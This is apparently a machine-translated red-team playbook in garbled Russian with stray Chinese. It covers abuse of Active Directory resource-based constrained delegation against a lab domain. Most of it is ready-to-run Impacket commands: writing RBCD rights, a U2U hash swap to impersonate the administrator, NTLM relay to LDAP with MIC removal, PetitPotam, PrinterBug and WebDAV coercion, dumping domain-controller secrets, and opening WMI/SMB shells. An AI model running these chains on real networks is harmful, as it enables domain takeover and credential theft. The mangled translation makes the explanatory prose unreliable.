Дайте машине добавить вRBCDиз Посылка: 1. Вы можете дать себе доп. в 2.ACL→Account Restriction/msDS-AllowedToActOnBehalfOfOtherIdentityсвойство→creator-sid/backdoor/high level пользователь. Если у вас есть учетная запись для инструмента пользователя объекта/домена компьютера Ограничение и свойства msDS-AllowedToActOnBehalfOfOtherIdentity WriteProperty позволяют выполнять операции на основе Ограниченное делегирование ресурсов изиспользовать.
(1).creator-sid пользователь:alice-workstationЕсли Алиса втянута в домен, у Алисы по умолчанию будет alice-workstation.изAccount Разрешение WriteProperty ограничения
(2) После получения полномочий домена добавьте. вbobверноalice-workstation$izmsDS-AllowedToActOnBehalfOfOtherIdentityizWritePropertyРазрешения 1.ldap_shell
2.lex
adfind запросы acl alice-workstation:
Демо для alice-workstation$злоупотреблять с Бобом:
Пользователи домена могут добавлять по умолчанию в 10 Введите компьютер в домен (maq) как бобиз добавить вbob-evil$
Установите bob-evil на rbcd alice-station$
Ограниченное делегирование генерирует билет cifs ST для администратора на alice-station$
Импортируйте билеты и получите интерактивную оболочку для wmi
https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html существует,Злоумышленник не может создать учетную запись на компьютере,Вы можете подключить пользователя домена rbcd к учетной записи доменного компьютера для злоупотребления.
Как указано выше, Алиса втягивает alice-station в домен, поэтому у Алисы есть разрешение **msDS-AllowedToActOnBehalfOfOtherIdentity WriteProperty пользователя домена alice-station$. ** Установите для bob значение alice-station$ в rbcd Боба:
getST.py генерирует билет cifs ST администратора для alice-station:
На этапе S4U2self сообщается об ошибке: Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN.
Это связано с тем, что пользователь не зарегистрировал SPN по умолчанию, и KDC не может выбрать правильный ключ для расшифровки, поэтому S4U2Self завершается сбоем. Если SPN добавить в Бобу и вы сможете успешно перевестись с KDC подает заявку на билеты ST, а это значит, что проблема не в самой учетной записи пользователя, а просто KDC Невозможно выбрать правильный ключ для расшифровки.
U2U реализует расширение аутентификации между пользователями. На этапе S4U2Proxy KDC попытается использовать долгосрочную аутентификацию Боба. key(bob хеш) для расшифровки, но U2U сделает После шифрования билета с помощью сеансового ключа TGT, прикрепленного к TGS-REQ, KDC не может его нормально расшифровать. В это время вы можете использовать SamrChangePasswordUserсуществоватьS4U2Self. Изменив хэш Боба с помощью S4U2Proxy на значение ключа шифрования TGT U2U, KDC может успешно расшифровать и выдать билеты ST. Подробную информацию см. по адресу: https://mp.weixin.qq.com/s/1eJb-UtSVRV5JF0gfQgwWg.
impacketиспользовать
Возьмем, к примеру, настройку делегирования обычного пользователя домена dandy в dc1$ на основе ограничений ресурсов. Здесь администратор напрямую настраивает rbcd.
# Установить денди на dc1$изRBCD
python3 rbcd.py redteam.lab/administrator:Qq123456.. -action write -delegate-to 'dc1$' -delegate-from 'dandy' -dc-ip 192.168.134.
# Используйте dandyиhash для генерации TGT (ntlm хеш использует шифрование RC4)
getTGT.py -hashes :$(pypykatz crypto nt 'Qq123456..') 'redteam.lab/dandy' -dc-ip 192.168.134.
# Получить дендиTGTизSession Key
python3 describeticket.py dandy.ccache | grep 'Ticket Session Key'
# Установить dandyzhash на сессию Key
python3 smbpasswd.py -newhashes :c592bc40c1908aff4787f4f4db7f0a82 'redteam/dandy:Qq123456..'@dc1.redteam.lab
# Импортировать TGT
export KRB5CCNAME=dandy.ccache
# использоватьu2uполучатьdc1изhost serviceизST
python3 getST.py -u2u -impersonate administrator -spn "host/dc1.redteam.lab" -k -no-pass 'redteam.lab/dandy'
# Импортировать ST
export KRB5CCNAME=administrator@host_dc1.redteam.lab@REDTEAM.LAB.ccache
# WMI
python3 wmiexec.py administrator@dc1.redteam.lab -k -no-pass
Примечание. На SamrChangePasswordUser влияет групповая политика домена. Стандартная и общая политика паролей в домене может не иметь возможности вовремя изменить пароль. Если он определенно пройдет ток 域пользователь能拿下DCиз Вы можете попробовать это,использовать成功后将пользователь密码改为原来изценить。
Ограниченное делегирование на основе ресурсов достигает цели делегирования путем изменения собственного поля msDS-AllowedToActOnBehalfOfOtherIdentity. По умолчанию этот доменный компьютер подключается к домену. У кого еще есть такое разрешение? Поскольку злая машина втягивается в домен через пользователя 07, злой ACL проходит через AdFind, а пользователи с разрешениями на запись фильтруются через запись.
AdFind -b "CN=evil,CN=Computers,DC=redteam,DC=lab" -s base nTSecurityDescriptor -sddl++ -resolvesids | findstr "write”
(https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities) В официальном документе четко указано, что пользователи служб, такие как iis, используют учетную запись компьютера (SYSTEM) для запроса сети ресурсы. В официальной документации четко указано, что пользователи служб, такие как iis, используют учетную запись компьютера (SYSTEM) для запроса сетевых ресурсов. )
Этот вызов ставит очень серьезную проблему: не только iis, но и все низкопривилегированные службы. (например, сетевые Локальные службы (например, сервис) запрашивают учетные записи компьютеров. Ресурсы внутри домена. Эта функция позволяет напрямую подключаться к настройкам контроллера домена с использованием ldap на основе текущего компьютера на основе ограниченного делегирования ресурсов, что приводит к падению текущего компьютера домена.
python3 getST.py -dc-ip 192.168.129.130 redteam/evilpc\$:123456 -spn cifs/web2008.redteam.lab -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k redteam/administrator@web2008.redteam.lab
Ретранслируйте целевую аутентификацию SMB на ldap контроллера домена через MITM. Поскольку SMB не может передаваться напрямую через LDAP, необходимо обойти проверку NTLM MIC (проверку целостности сообщения), что дает злоумышленнику возможность получить высшие полномочия в домене, используя только одну обычную учетную запись домена. 1. Создайте доменную машину
python3 addcomputer.py -method SAMR -dc-ip 192.168.130.130 -computer-name QQQ -computer-pass 1qaz@WSX "redteam.lab/carn2:Qq123456.."
2.ntlmrelayx.py мониторинг
python3 ntlmrelayx.py -t ldap://192.168.130.131 -domain redteam.lab -smb2support --remove-mic --delegate-access --escalate-user QQQ$
3. Принудительное срабатывание защиты от подключения.
python3 PetitPotam.py 192.168.130.1 192.168.130.130 -u carn2 -p Qq123456.. -d redteam.lab
------
python3 printerbug.py Домен/имя пользователя:пароль@serviceip Вернуть IP
python3 printerbug.py hiro/win10:123456789qwe.@192.168.228.33 192.168.1.
Ntlmrelayx.py обходит NTLM MIC, через SMB relay в LADP, поскольку контроллер домена не находится в Exchange Windows Он находится в группе «Разрешения», поэтому его нельзя записать. ACL не может быть назначен указанному пользователю добавить однако разрешение Dcsync позволяет создать новую учетную запись компьютера и настроить для учетной записи компьютера ограниченное делегирование самому вторичному контроллеру домена.
Ограниченное делегирование на основе ресурсов создает билет ST администратора для DC1.
python3 getST.py -spn host/dc1.redteam.lab 'redteam.lab/QQQ$:1qaz@WSX' -impersonate administrator -dc-ip 192.168.130.
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k -no-pass dc1.redteam.lab -just-dc
Web Распределенная авторская разработка и контроль версий (WebDAV) это протокол передачи гипертекста (HTTP) расширение, которое определяет, как использовать HTTP ( docs.microsoft.com ) выполнить комплекс Основные функции файлов, такие как копирование, перемещение, удаление и создание. Нужно включить WebClient Услуги могут основываться на WebDAV из Программы и функции работают нормально. Оказывается, злоумышленники могут косвенно злоупотреблять. WebClient сервис для принудительной аутентификации. Этот вид умения Эту технологию необходимо объединить с другими технологиями принуждения (такими как PetitPotam, PrinterBug) в качестве усилителя этих технологий. , тем самым улучшая NTLM Возможность реле. Когда включено WebDAV из UNC Когда файловая операция запускается по пути, узел аутентификации выполняет следующее:
Общий процесс проверки личности может выглядеть следующим образом:
существовать Active Directory в конфигурации по умолчанию вы можете существовать WebClient Удаленно взять на себя управление рабочей станцией во время работы службы (Windows 7/10/11) и возможно изсервера (если установка опыт работы с настольным компьютером). Вкратце, как это делается:
Следует отметить, что из WebClient Служба не запускается автоматически при запуске существования. Однако, если сработало WebClient Сервис существует, запускается на рабочей станции, и управление системой возможно удаленно. существуют Принудительная аутентификация в процессе, WebDAV можно заменить SMB,проходить Следующий форматиз UNC Злоумышленник получил доступ к пути HTTP Сервер: Хотя этот путь отличается от SMB По умолчанию в соглашении из UNC Разница в пути невелика, но влияние огромно. Наиболее очевидное различие заключается в том, что клиент больше не используется. SMB протокол, вместо него будет использоваться HTTP протокол(WebDAV),тем самымсуществовать Relay To LDAP/s обойти подпись. Более того, еще одним преимуществом этого является то, что злоумышленник HTTP Сервер может работать на любом порту, что обеспечивает большую гибкость с точки зрения красной команды, что позволяет нам избежать работы с уже связанными портами. SMB порт.
использовать:существовать客户端机器上启动 WebClient обслуживание, а затем пройти WebClient осуществлять NTLM Relay To LDAP/s, установленный для текущей машины msDS- KeyCredentialLink или msDS-AllowedToActOnBehalfOfOtherIdentity свойства и в конечном итоге переходят Shadow Credentials или RBCD Повышайте привилегии.
1. Служба WebClient должна работать на существующем целевом объекте. 2. По умолчанию Интернет Клиент будет только автоматически Intranet изhost в зоне для аутентификации, WebClient Только для местной интрасети (Локальный Интранет) или доверенный с сайта (Доверенное Сайты) список целевого использования «Учетные данные по умолчанию» Аутентификация. Один из способов добиться этого — использовать внутреннее имя netbios атакующего хоста (без предложения). 点)или ВОЗиспользоватьdnstool.py Для злоумышленника добавить вднс для завершения. 3. Должно быть отключено LDAP Привязка подписи/канала (по умолчанию). 4. Используется для принуждения HTTP Аутентификация должна выполняться с использованием имени netbios.
socks 26085
1.использоватьwebclientservicescannerЗапрос
webclientservicescanner redteam/carn:'4120'@192.168.130.100 -dc-ip 192.168.130.
Если веб-клиент не открыт, вы можете использовать StartWebClientSvc.o, чтобы открыть его с низкими разрешениями.
2.использовать запрос службы sc
sc query webclient
sc config webclient start=demand/auto/disabled
sc start webclient
3. Используйте Crackmapexec для проверки.
./crackmapexec smb 192.168.130.1/24 -u administrator -p 'Qq123456..' -M webdav
rportfwd_local 8003 0.0.0.0 80
python3 addcomputer.py -method SAMR -dc-ip 192.168.130.130 -computer-name QAZ -computer-pass 1qaz@WSX "redteam.lab/carn2:Qq123456.."
python3 ntlmrelayx.py -domain redteam.lab -t ldap://192.168.130.130 --delegate-access --escalate-user QAZ$
python3 PetitPotam.py -u carn2 -p Qq123456.. -d redteam.lab Win-10@8003/print 192.168.130.
python3 getST.py -dc-ip 192.168.130.130 -spn cifs/win-10.redteam.lab redteam.lab/QAZ$:'1qaz@WSX' -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 wmiexec.py -no-pass -k administrator@win-10.redteam.lab -dc-ip 192.168.130.
Члены группы «Операторы учетной записи» могут изменять все атрибуты pcizmsDS-AllowedToActOnBehalfOfOtherIdentity в домене, кроме dc.
./main -d redteam.lab --dc 192.168.134.130 -u marry -H 5e95607216d9a4b7654d831beb9ee95c --AccountOperators
addcomputer
python3 addcomputer.py -method SAMR -dc-ip 192.168.134.130 -computer-name evil-op$ -computer-pass Qq123456.. "redteam.lab/op:Qq123456.."
addRBCD
python3 rbcd.py redteam.lab/administrator:Qq123456.. -action write -delegate-to 'testcomputers$' -delegate-from 'evil-op$' -dc-ip 192.168.134.130